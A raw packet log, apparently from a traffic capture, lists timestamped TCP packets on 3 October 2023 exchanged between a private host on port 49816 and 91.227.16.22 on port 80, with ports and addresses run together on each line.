                                                                    Oct 3, 2023 09:55:09.984550953 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.984581947 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.984710932 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.984874010 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.984915018 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.984951973 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.985045910 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.985078096 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.985114098 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.985207081 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.985239983 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.985322952 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.985395908 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.985426903 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.985507011 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.985579014 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.985627890 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.985665083 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.985769987 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.985815048 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.985841036 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.985876083 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.985937119 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.985970974 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.986027002 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.986108065 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.986143112 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.986170053 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.986267090 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.986300945 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.986337900 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.986501932 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.986536980 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.986567020 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.986713886 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.986749887 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.986870050 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.986965895 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.986998081 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.987102032 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.987178087 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.987190008 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.987212896 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.987229109 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.987278938 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.987308979 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.987354040 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.987389088 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.987418890 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.987457037 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.987505913 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.987538099 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.987545013 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.987612009 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.987642050 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.987654924 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.987720966 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.987750053 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.987787962 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.987870932 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.987901926 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.987930059 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.988001108 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.988037109 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.988075018 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.988154888 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.988184929 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.988243103 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.988327026 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.988358974 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.988399029 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.988414049 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.988454103 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.988481045 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.988537073 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.988585949 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.988636017 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.988651991 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.988682985 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.988701105 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.988745928 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.988780975 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.988801003 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.988883972 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.988924026 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.988944054 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.988975048 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.989007950 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.989026070 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.989053965 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.989082098 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.989118099 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.989165068 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.989192963 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.989219904 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.989299059 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.989332914 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.989360094 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.989438057 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.989466906 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.989543915 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.989610910 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.989638090 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.989674091 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.989701033 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.989733934 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.989756107 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.989793062 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.989823103 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.989840031 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.989903927 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.989942074 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.989960909 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.989988089 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.990037918 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.990056992 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.990072012 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.990145922 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.990174055 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.990241051 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.990272045 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.990307093 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.990314960 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.990344048 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.990375042 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.990449905 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.990540981 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.990571976 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.990597963 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.990674973 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.990705013 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.990756989 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.990839958 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.990869999 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.990880966 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.990894079 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.990923882 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.990962982 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.991024017 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.991053104 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.991099119 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.991185904 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.991215944 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.991254091 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.991298914 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.991332054 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.991358042 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.991420031 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.991451979 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.991489887 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.991583109 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.991672993 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.991677999 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.991748095 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.991760969 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.991779089 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.991790056 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.991871119 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.991899967 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.991924047 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.992001057 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.992031097 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.992057085 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.992125034 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.992153883 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.992180109 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.992280960 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.992327929 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.992383957 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.992444038 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.992474079 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.992501974 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.992563009 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.992593050 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.992674112 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.992830992 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.992863894 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.992903948 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.992953062 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.993001938 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.993011951 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.993050098 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.993100882 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.993112087 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.993238926 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.993273020 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.993278980 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.993341923 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.993375063 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.993396997 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.993475914 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.993508101 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.993546009 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.993649960 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.993685007 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.993733883 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.993825912 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.993860960 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.993916035 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.993999958 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.994030952 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.994076967 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.994180918 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.994211912 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.994249105 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.994301081 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.994330883 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.994368076 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.994417906 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.994472980 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.994484901 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.994549036 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.994595051 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.994620085 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.994700909 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.994733095 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.994770050 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.994848013 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.994879961 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.994899035 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.994946003 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.994976997 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.994992971 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.995064974 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.995095015 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.995156050 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.995328903 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.995361090 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.995423079 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.995614052 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.995647907 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.995676994 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.995728970 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.995762110 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.995820999 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.995889902 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.995903969 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.995955944 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.996037006 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.996120930 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.996247053 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.996289015 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.996321917 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.996463060 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.996576071 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.996606112 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.996633053 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.996706963 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.996737957 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.996767044 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.996850014 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.996881962 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.996908903 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.996963024 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.996994972 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.997014999 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.997111082 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.997140884 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.997169018 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.997260094 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.997289896 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.997298002 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.997365952 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.997397900 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.997436047 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.997533083 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.997587919 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.997657061 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.997658014 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.997693062 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.997706890 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.997762918 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.997791052 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.997811079 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.997869968 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.997905016 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.997958899 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.998028040 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.998060942 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.998089075 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.998186111 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.998214960 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.998223066 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.998270035 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.998301029 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.998330116 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.998435974 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.998466015 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.998491049 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.998564959 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.998600960 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.998622894 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.998697996 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.998730898 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.998740911 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.998820066 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.998855114 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.998881102 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.998963118 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.998994112 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.999022007 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.999085903 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.999136925 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.999207020 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.999233961 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.999258041 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.999279022 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.999368906 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.999403000 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.999429941 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.999485970 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.999517918 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.999546051 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.999614000 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.999644995 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.999708891 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.999773979 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.999806881 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.999866962 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.999934912 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.999968052 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.999994993 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:10.000061035 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:10.000093937 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:10.000116110 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:10.000195980 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:10.000231981 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:10.000274897 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:10.000323057 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:10.000356913 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:10.000381947 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:10.000432968 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:10.000463009 CEST4981680192.168.2.391.227.16.22
